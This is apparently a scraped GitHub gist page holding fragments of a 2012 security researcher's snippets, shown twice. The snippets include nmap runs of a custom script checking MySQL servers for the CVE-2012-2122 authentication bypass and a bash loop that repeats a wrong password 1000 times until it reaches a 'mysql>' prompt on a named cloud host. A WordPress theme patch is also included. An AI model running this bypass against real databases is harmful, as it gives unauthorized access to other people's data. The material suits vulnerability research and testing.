MW marcwickenden

## gist:2918314
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0

## gist:2918081
-- Version 0.1
-- Created 11/06/2012 - v0.1 - created by Marc Wickenden <marc@offensivecoder.com>, based on nse script by Patrik Karlsson

## gist:2918069
description = [[
Checks for MySQL servers vulnerable to the authentication bypass CVE-2012-2122
posted to http://seclists.org/oss-sec/2012/q2/493
]]

---
-- @output
-- 3306/tcp open  mysql
-- | mysql-auth-bypass:
-- |_  user root is vulnerable to auth bypass

## gist:2918126
      socket:close()
    end
  end

## file1.lua
  return stdnse.format_output(true, result)

end

## gist:2918409
root@7E-Marc:~# for i in `seq 1 1000`; do mysql -u nse --password=bad -h ec2-46-137-134-79.eu-west-1.compute.amazonaws.com  2>/dev/null; done
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 756
Server version: 5.5.22-0ubuntu1-log (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

## gist:2918421
root@7E-Marc:~# ls -l /usr/local/share/nmap/scripts/mysql-*
-rw-r--r-- 1 root root 6099 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-audit.nse
-rw-r--r-- 1 root root 2268 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-brute.nse
-rw-r--r-- 1 root root 2895 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-databases.nse
-rw-r--r-- 1 root root 1799 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-empty-password.nse
-rw-r--r-- 1 root root 4855 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-info.nse
-rw-r--r-- 1 root root 2687 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-users.nse
-rw-r--r-- 1 root root 3100 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-variables.nse

## gist:2918310
# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up (0.050s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-auth-bypass:
|_  user nse is vulnerable to auth bypass

## gist:2935754
root@debian1:/var/www/0day# ls -l
total 4
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
root@debian1:/var/www/0day# curl http://localhost/0day/test.php
nothing to see here
root@debian1:/var/www/0day# cp test.php{,~}
root@debian1:/var/www/0day# ls -l
total 8
-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
-rw-r--r-- 1 root root 41 Jun 15 11:26 test.php~

## responsive.1.6.2-vimeo.patch
diff -ruw responsive.1.6.2/footer.php responsive.1.6.2-vimeo/footer.php
--- responsive.1.6.2/footer.php	2012-06-19 09:35:37.495143600 +0100
+++ responsive.1.6.2-vimeo/footer.php	2012-06-19 09:25:42.000000000 +0100
@@ -64,6 +64,10 @@
                     .'<img src="' . get_stylesheet_directory_uri() . '/icons/youtube-icon.png" width="24" height="24" alt="YouTube">'
                     .'</a></li>';

+                if (!empty($options['vimeo_uid'])) echo '<li class="vimeo-icon"><a href="' . $options['vimeo_uid'] . '">'
+                    .'<img src="' . get_stylesheet_directory_uri() . '/icons/vimeo-icon.png" width="24" height="24" alt="Vimeo">'
+                    .'</a></li>';
	# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

	Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
	--------------- Timing report ---------------
	hostgroups: min 1, max 100000
	rtt-timeouts: init 1000, min 100, max 10000
	max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
	parallelism: min 0, max 0
	max-retries: 10, host-timeout: 0
	min-rate: 0, max-rate: 0
	-- Version 0.1
	-- Created 11/06/2012 - v0.1 - created by Marc Wickenden <marc@offensivecoder.com>, based on nse script by Patrik Karlsson
	description = [[
	Checks for MySQL servers vulnerable to the authentication bypass CVE-2012-2122
	posted to http://seclists.org/oss-sec/2012/q2/493
	]]

	---
	-- @output
	-- 3306/tcp open mysql
	-- \| mysql-auth-bypass:
	-- \|_ user root is vulnerable to auth bypass
	root@7E-Marc:~# for i in `seq 1 1000`; do mysql -u nse --password=bad -h ec2-46-137-134-79.eu-west-1.compute.amazonaws.com 2>/dev/null; done
	Welcome to the MySQL monitor. Commands end with ; or \g.
	Your MySQL connection id is 756
	Server version: 5.5.22-0ubuntu1-log (Ubuntu)

	Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

	mysql>
	root@7E-Marc:~# ls -l /usr/local/share/nmap/scripts/mysql-*
	-rw-r--r-- 1 root root 6099 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-audit.nse
	-rw-r--r-- 1 root root 2268 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-brute.nse
	-rw-r--r-- 1 root root 2895 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-databases.nse
	-rw-r--r-- 1 root root 1799 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-empty-password.nse
	-rw-r--r-- 1 root root 4855 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-info.nse
	-rw-r--r-- 1 root root 2687 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-users.nse
	-rw-r--r-- 1 root root 3100 2012-01-08 17:02 /usr/local/share/nmap/scripts/mysql-variables.nse
	# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

	Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
	Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
	Host is up (0.050s latency).
	PORT STATE SERVICE
	3306/tcp open mysql
	\| mysql-auth-bypass:
	\|_ user nse is vulnerable to auth bypass
	root@debian1:/var/www/0day# ls -l
	total 4
	-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
	root@debian1:/var/www/0day# curl http://localhost/0day/test.php
	nothing to see here
	root@debian1:/var/www/0day# cp test.php{,~}
	root@debian1:/var/www/0day# ls -l
	total 8
	-rw-r--r-- 1 root root 41 Jun 15 11:25 test.php
	-rw-r--r-- 1 root root 41 Jun 15 11:26 test.php~
	diff -ruw responsive.1.6.2/footer.php responsive.1.6.2-vimeo/footer.php
	--- responsive.1.6.2/footer.php 2012-06-19 09:35:37.495143600 +0100
	+++ responsive.1.6.2-vimeo/footer.php 2012-06-19 09:25:42.000000000 +0100
	@@ -64,6 +64,10 @@
	.'<img src="' . get_stylesheet_directory_uri() . '/icons/youtube-icon.png" width="24" height="24" alt="YouTube">'
	.'</a></li>';

	+ if (!empty($options['vimeo_uid'])) echo '<li class="vimeo-icon"><a href="' . $options['vimeo_uid'] . '">'
	+ .'<img src="' . get_stylesheet_directory_uri() . '/icons/vimeo-icon.png" width="24" height="24" alt="Vimeo">'
	+ .'</a></li>';